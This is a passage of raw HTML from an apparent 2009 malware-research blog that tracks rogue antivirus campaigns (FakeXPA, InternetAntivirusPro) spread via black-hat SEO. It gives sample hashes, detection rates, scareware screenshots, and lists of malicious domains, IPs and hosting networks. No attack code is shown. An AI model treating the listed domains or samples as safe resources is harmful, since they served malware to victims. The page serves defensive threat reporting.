href="http://www.threatexpert.com/report.aspx?md5=b7d14c7ea7844057efcfd1a41ddc530f" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td><span id="status_nombre">AntiVirusInstaller.exe</span></td><td> </td></tr><tr><td> </td><td>File size</td><td>53278 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>f8d38325d9570ce3320f04e9d5278466</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/a3298bbca2c92a71a94a9714b153f4b2" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:08:19 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>8/38 (21.06%)</td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=f8d38325d9570ce3320f04e9d5278466" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td><span id="status_nombre2">N1.CAB</span></td><td> </td></tr><tr><td> </td><td>File size</td><td>504489 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>c37aa0887be14b68381301e24ddaf8fb</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/c669c1d718e5c0bc093de2b0ac056668" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span> / <span style="color:#FF0000">Trojan.Win32.Tibs</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:08:51 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>5/38 (13.16%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td><span id="status_nombre3">N1.exe</span></td><td> </td></tr><tr><td> </td><td>File size</td><td>527360 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>2d6a49219639d63428b91eb7647ce491</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/0609f9e706d89d88c4974e6e1fa7f132" target="_blank">Report</a> Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs</td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:09:09 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>5/38 (13.16%)</td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=2d6a49219639d63428b91eb7647ce491" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td><span id="status_nombre4">QWProtect.dll</span></td><td> </td></tr><tr><td> </td><td>File size</td><td>697856 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>1b6c35cb941eaa9f6325a449cb6770b0</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/ca7e3abef6b7e32784ae71c4e318f232" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:09:01 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>4/38 (10.53%)</td><td> </td></tr><tr><td> </td><td><b>Prevx:</b></td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=08C32F6500787727A6D70AF671E49C00FE632D2D" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=1b6c35cb941eaa9f6325a449cb6770b0" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td><span id="status_nombre5">svchost.exe </span></td><td> </td></tr><tr><td> </td><td>File size</td><td>80896 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>c2613b801da4c8b6967d6da05c0443ed</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/094616f46644e51261fb3890e6ddfdcb" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:08:47 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>10/38 (26.32%)</td><td> </td></tr><tr><td> </td><td><b>Prevx:</b></td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=EB150CF5002DB1BC3C47012344E9CF00C09C3521" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=c2613b801da4c8b6967d6da05c0443ed" target="_blank">Report</a></td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr> <tr><td height="200"> </td><td><br />Display fake BlueScreen "MALWARE.MONSTER.DX_NEW_0xA21518F0" <br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s1600-h/fake-bsod.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s320/fake-bsod.jpg" border="0" alt="Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0"id="BLOGGER_PHOTO_ID_5316746839087634674" /></a><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s1600-h/Anti-Virus+Number-1+Installer.bmp"><img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s320/Anti-Virus+Number-1+Installer.bmp" border="0" alt="Rogue Anti-Virus Number-1"id="BLOGGER_PHOTO_ID_5316749153654116034" /></a><br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Anti-Virus Number-1 Rogue Application Screenshot:</b></td></tr><tr><td height="200"> </td><td><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTxgt6OI/AAAAAAAAAQA/ManMH1wtCBI/s1600-h/anti-virus1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTxgt6OI/AAAAAAAAAQA/ManMH1wtCBI/s320/anti-virus1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318374367144306914" /></a><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTk6Y3kI/AAAAAAAAAP4/xCToBtIYOnk/s1600-h/anti_virus_1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTk6Y3kI/AAAAAAAAAP4/xCToBtIYOnk/s320/anti_virus_1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318374363762318914" /></a><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-574802831309357886?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-37517164868308218032009-03-27T16:21:00.000-07:002009-04-20T16:27:25.180-07:00Black Hat SEO and Rogue Antivirus<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><p> Messages telling you to install and update security software for your computer is a scary message. <br /> This tactic is known as <a rel="dofollow" href="http://en.wikipedia.org/wiki/Scareware" title="Scareware Definition" target="_blank">scareware</a>: http://en.wikipedia.org/wiki/Scareware<br /><br />Related article about "Free Security Scan" alerts from the Federal Trade Commission<br /><a rel="dofollow" href="http://www.ftc.gov/opa/2008/12/winsoftware.shtm" title="Court Halts Bogus Computer Scans" target="_blank">Court Halts Bogus Computer Scans</a> <br /><a rel="dofollow" href="http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.shtm" title=""Free Security Scan" Could Cost Time and Money" target="_blank">"Free Security Scan" Could Cost Time and Money</a><br /></p><p><a href="http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.pdf" rel="dofollow"><img style="cursor:pointer; cursor:hand;width: 320px; height: 206px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc0wT27hu1I/AAAAAAAAANg/3Of3Qi_YVgs/s320/FTC_ConsumerAlert.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5317959852715260754" /></a> <br /> <br />Since several months ago, massive attacks (obfuscated javascript inserted - IFRAME to inject backdoors/keyloggers), thousand of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies.<br /> <br /> The exponential growth of rogue antivirus distribution through legitimate websites remain silent as the tactic used by the creators continued to become more sophisticated.<br /> <br />Related article: <a href="http://www.theregister.co.uk/2008/10/16/fake_av_scam/" target="_blank">Scammers making '$15m a month' on fake antivirus</a> <br />PandaLabs: <a href="http://news.prnewswire.com/ViewContent.aspx?ACCT=109&STORY=/www/story/01-08-2009/0004951691&EDATE=" target="_blank">22,000 New Malware Samples Detected Every Day in 2008</a><br /><a href="http://www.pandasecurity.com/enterprise/security-info/tools/reports.html" target="_blank">PandaLabs Annual Report</a><br /></p><table width="426" height="204" border="0" cellpadding="0" cellspacing="0" style="background:url(http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc0q9veZdlI/AAAAAAAAANQ/Lav1ymd6cvA/s400/Rogue-AV-Detections.jpg) no-repeat;"><tr><td width="412" height="190" valign="top" style="padding-left:35px; padding-top:35px; color: #333; font-size:14px; font-weight:bold">Rogue AV Detections in 2008</td></tr></table><p>Sites on this blog refers to rogue antispyware which display misleading scan alerts and mostly installed on computer's victim without user consent throught infected websites (LEGITIMATE infected websites).<br /><br /><hr />UPDATE:<br /><br />The site now include IPs / botnet C&C / data logs exposed, links to LIVE urls exploits/vulnarabilities (flash - pdf) and domains with their relations, route, AS and malicious scripts found on<br />compromised websites related to the same campaign.<br /><br /><hr /><br /> If you arrived to this page through a search engine about a domain in this blog, some removal information can be found on the links below. Sites analysis will be created and updated as new sites will be found. Twice or more a day if needed.</p><p>If you arrived to this page and you are interested to find some information about these attacks, <br />IPs domains and networkd used, here are some links used with details about this malware campaign <br /> <br />Related article:<br /><br /><a href="http://malware-web-threats.blogspot.com/2009/03/easywinscanner17com-fake-scanner.html" target="_blank">Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/securedpaymentsystemcom-antivirus360.html" target="_blank">Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html" target="_blank">Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus </a> <br /><a href="http://malware-web-threats.blogspot.com/2009/03/mostpopularscancom-browser-hijacker.html">Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/stabilityinetscan-zlkon-malware-drop.html" target="_blank">Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/antispyware-pro-2009-spyware-threat.html" target="_blank">Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009</a> <br /><a href="http://malware-web-threats.blogspot.com/2009/03/systemguard2009-spyware-new-rogue.html" target="_blank">Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/systemsecurity2009-spread-new-variants.html">Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro</a> <br /><a href="http://malware-web-threats.blogspot.com/2009/03/internetantiviruspro-spyware-spread-new.html">Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants</a><br /><br />Black Hat SEO and Rogue Antivirus:<br /><br />Part. 1) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html">Black Hat SEO and Rogue Antivirus</a><br />Part. 2) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p2.html">Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery</a> <br />Part. 3) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p3.html" target="_blank">Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and liveinternetmarketingltd.com</a> <br />Part. 4) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p4.html" target="_blank">Black Hat SEO and Rogue Antivirus: Full or Rogues</a> <br />Part. 5) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p5.html" target="_blank">Black Hat SEO and Rogue Antivirus: Full of Hacks</a><br />Part. 6) <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p6.html" target="_blank">Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1</a><br />Part. 7) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p7.html" target="_blank">Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2</a><br />Part. 8) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p8.html" target="_blank">Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger</a> <br /><br />Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc.<br /><br />Part. 1) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p1.html">Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked</a><br />
Part. 2) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p2.html">Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED</a><br />Part. 3) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p3.html">Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats</a><br />
Part. 3) <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p4.html">Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild</a><br /><br /><hr />And here we have a list of fake scanner websites used in the attack which infect thousand of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="Black Hat SEO and Rogue Antivirus">Black Hat SEO and Rogue Antivirus</a><br /><br /><u>Note</u>: <br /><br />Other rogue av like <b>AntivirusPlus</b> through <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p3.html">this list</a> has been detected recently<br /><br />Many more like under the name of <b>FakeSpyGuard</b>, <b>VirusRemover</b>, <b>WinAntiVirus2008</b>, <b>SpywareRemover2009</b>, and some variant of "Trojan Hiloti" through <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p4.html">this list</a><br /><br /> <u>Similar attacks with Google search strings</u> :<br /><br />In 2008: We have an example with "Antivirus 2009" on the Trend Micro Malware Blog: <br /><a href="http://blog.trendmicro.com/a-million-search-strings-to-get-infected/" target="_blank">A Million Search Strings to Get Infected</a><br /><br />A few days ago: On the CA website "onlinestabilityworld.com" is cited. The article is here: <br /><a href="http://community.ca.com/blogs/securityadvisor/archive/2009/03/19/rogue-security-software-keeps-on-hitting-google-searches.aspx" target="_blank">Rogue Security Software keeps on hitting Google searches</a><br /><br />Another list of fake codec websites in March on the Dancho Danchev's blog alsocited on this blog<br /><a href="http://ddanchev.blogspot.com/2009/04/bogus-linkedin-profiles-redirect-to.html" target="_blank">Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software</a> <br /><br />And recent search also reveal the use of a powerfull javascript library jQuery - the screenshot below has been retreived from a legitimated infected website.<br /><br />Deobfuscated result is:<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdG9QypwVpI/AAAAAAAAARQ/OjuxQ03u8X4/s1600-h/js.js.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 15px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdG9QypwVpI/AAAAAAAAARQ/OjuxQ03u8X4/s320/js.js.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5319240731073730194" /></a><br /><br />The ip is 94.247.2.195 (ZlKon)<br /><br /><br /><hr /><br />Network used for hosting these malicious website are <br /> <br /><b>Starline Web Services</b> in Estonia<br /><b>Zlkon</b> in Latvia<br /><b>netdirekt e.K.</b> in Germany<br /><b>Hetzner Online AG</b> in Germany <br /><b>Ural-NET</b> in Russia<br /><b>Eurohost LLC</b> in Ukraine <br /><b>GloboTech via Olexij Khrenov</b> in Ukraine<br /><b>Joint Multimedia Cable Network</b> in Ukraine<br /> <b>NTColo Networks</b> in Ukraine<br /> <b>Plitochnik Lux LTD</b> in Ukraine<br /> <b>Coloquest</b> in US<br /> <b>Netelligent Hosting Services Inc</b> in US<br /> and some other in China, Moldavia.<br /> IPs, AS and network used can be found on this blog.<br /><br />-------------<br /> New sites used<br /><br />on March 28: slot4scan.com, scan4fuse.com, list4scan.com, scan4home.com, gotimescan.com<br />on March 29: mainscan6.com, scan4plus.info, scan4open.com<br /><br />on March 30: <br /><br />logscan6.com<br />scan4way.com [redirection by gostepscan.com]<br />5scanav.com and scan5plus.com [redirection by gowithscan.com]<br />new4scan.info,scan4live.info<br /><br />April:<br /><br />best4scan.info, best6scan.info,pro4scan.info,scanline6.com, scan6log.com, scan6main.com, scan6now.com,zpmuwbtqqwkw.net<br /><a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/internetantiviruspro-spyware-spread-new.html" title="Black Hat SEO and Rogue Antivirus">Analysis here</a><br /><br />-------------<br /><br /><br />Related article: <a href="http://www.pandasupport.net/up/Rogue/RogueAV.pdf">The rash of rogue av</a> (PDF)<br /><br />Related article about McColo Business:<br />Similar network at UltraNet Ltd in Lavtia<br /><a href="http://hostexploit.com/downloads/Hostexploit Cyber Crime USA v 2.0 1108.pdf" target="_blank">HostExploit’s Cyber Crime Series</a> (PDF)</p><p>The list on your right hand side are latest websites used in this malware campaign. (Updated daily)<br /><br />Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia <br />Pages related to the same attack. (Included some other problems, SPAM, botnet etc...)<br /><br />December 15, 2008: <br />FakeAV and Codecs<br /><a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/">http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/</a> <br /><br />December 19, 2008: <br />SPAM IP Detected<br /><a href="http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html">http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html</a> <br /><a href="http://www.projecthoneypot.org/ip_94.247.2.29">http://www.projecthoneypot.org/ip_94.247.2.29</a> <br /><br />McAfee Avert Labs Blog<br />Monday January 5, 2009<br />Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business<br /><a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/">http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/</a> <br />We also have an complete example <a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-pdf-malware-campaign.html">here</a>. From the visitor to the legitimate infected website (with logs, screenshot, ips and analysis of the malicious website as well as the technic used. i.e: SUTRA traffic redirection, PDF exploit to inject backdoors etc..)<br /><br />Zeus Tracker<br /><a href="https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211">https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211</a><br /><br />Wednesday January 7, 2009 <br />Google Code Project Abused by Spammers<br /><a href="http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/">http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/</a> <br /><br />January 19, 2009<br />Inaccurate whois details<br /><a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx">http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx</a> <br /><br />January 2009<br /><a href="http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html">http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html</a> <br />Paragraph:Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called "Zlkon.lv."<br /><br /><a href="http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html">http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html</a> <br /><a href="http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html">http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html</a><br /><br />Paragraph from the ddanchev.blogspot.com:<br /></p>Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customer, of course under domains, have been generating quite some malicious activity at zlkon.lv for a while.<br /><br />January 25, 2009<br />Rogue software - FakeAV<br /><a href="http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx">http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx</a><br /><br />February 5, 2009<br />Similar attack with the same added code between like <!-- ad --> <!-- /ad --> <br />(<a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html">Same code here</a>)<br /><a href="http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx">http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx</a><p> Other: <a href="http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx">http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx</a> <br /><br />Wednesday February 25, 2009<br />Google Trends Abused to Serve Malware<br /><a href="http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/">http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/</a><br /> <br /> <br /><br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3751716486830821803?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-82853731624346275272009-03-27T01:45:00.000-07:002009-04-02T06:45:09.371-07:00InternetAntivirusPro Spyware spread new variants<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1291" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">InternetAntivirusPro Spyware spread new variants</span><br /><br />Some new websites appear to distribute a new variant of the fake antispyware InternetAntivirusPro <br />Detected as WinWebSecurity or FakeSpyGuard. 2 or 3 new sites are registered every day. <br /></p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td> </tr></table><br />Site screenshot retreived from <a href="http://malware-web-threats.blogspot.com/2009/03/systemsecurity2009-spread-new-variants.html">this page</a> (same domains)<br />A list can be found <a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" target="_blank">here</a><br /><br />bestscan5.com [March 31]<br />fuse4scan.com [March 27]<br />gotimescan.com [march 28]<br />list4scan.com [march 28]<br />logscan6.com [March 26]<br />mainscan6.com [March 27]<br />scan4fuse.com [March 28]<br />scan4open.com [March 28]<br />scan4plus.info [March 29]<br />slot4scan.com [March 28]<br />new4scan.info [March 30]<br />scan4live.info [March 30] <br />scan4pro.info [March 31]<br /><br />April new:<br /><br />best4scan.info [April 1]<br />best6scan.info [April 2] <br />pro4scan.info [April 1] <br />scanline6.com [April 2] <br />scan6log.com [April 1] <br />scan6main.com [April 1]<br />scan6now.com [April 1]<br />zpmuwbtqqwkw.net [April 1] <br /><br />-----------<br />Other ACTIVE: <br /><br />Registrar NETEARTH ONE, INC. DBA NETEARTH<br />Domain: 5scanav.com, scan5av.com<br />Registration Service Provided By: SELLOUT.NAME<br /> ----------<br />Created on January 14 2009<br /><br />Registrar: REGTIME LTD<br />Domain: scan5plus.com<br />DNS Servers: NS1.SCAN5PLUS.COM NS2.SCAN5PLUS.COM<br />---------- <br />Created on March 16 2009<br /><br />Registrar: UK2 GROUP LTD.<br />Domain: logscan6.com<br />DNS Servers: NS1.SITELUTIONS.COM NS2.SITELUTIONS.COM<br />Registration Service Provided By: SELLOUT.NAME<br />-------------<br />Created on March 23 2009:<br /> <br />Registrar: UK2 GROUP LTD.<br />Domain: scan4way.com<br /> DNS Servers used are NS1.DNSEXIT.COM - NS2.DNSEXIT.COM<br />Registration Service Provided By: SELLOUT.NAME <br />-------------<br /><br /><u><b>Fake Trojan-IM.Win32.Faker.a Alert - Internet Antivirus Pro Warning</b></u>:<br /><br />Trojan-IM.Win32.Faker.a<br />Virus.Win32.Faker.a<br />Trojan.PSW.BAT.Cunter<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s1600-h/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 211px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s320/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316696079942767378" /></a><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sciy7OIwpGI/AAAAAAAAALI/_BGG_wSxuX0/s1600-h/scan4lite.com-Fake.Virus.Trojan-IM.Win32.Faker.a.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 278px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sciy7OIwpGI/AAAAAAAAALI/_BGG_wSxuX0/s320/scan4lite.com-Fake.Virus.Trojan-IM.Win32.Faker.a.jpg" border="0" alt="scan4lite.com Fake message: 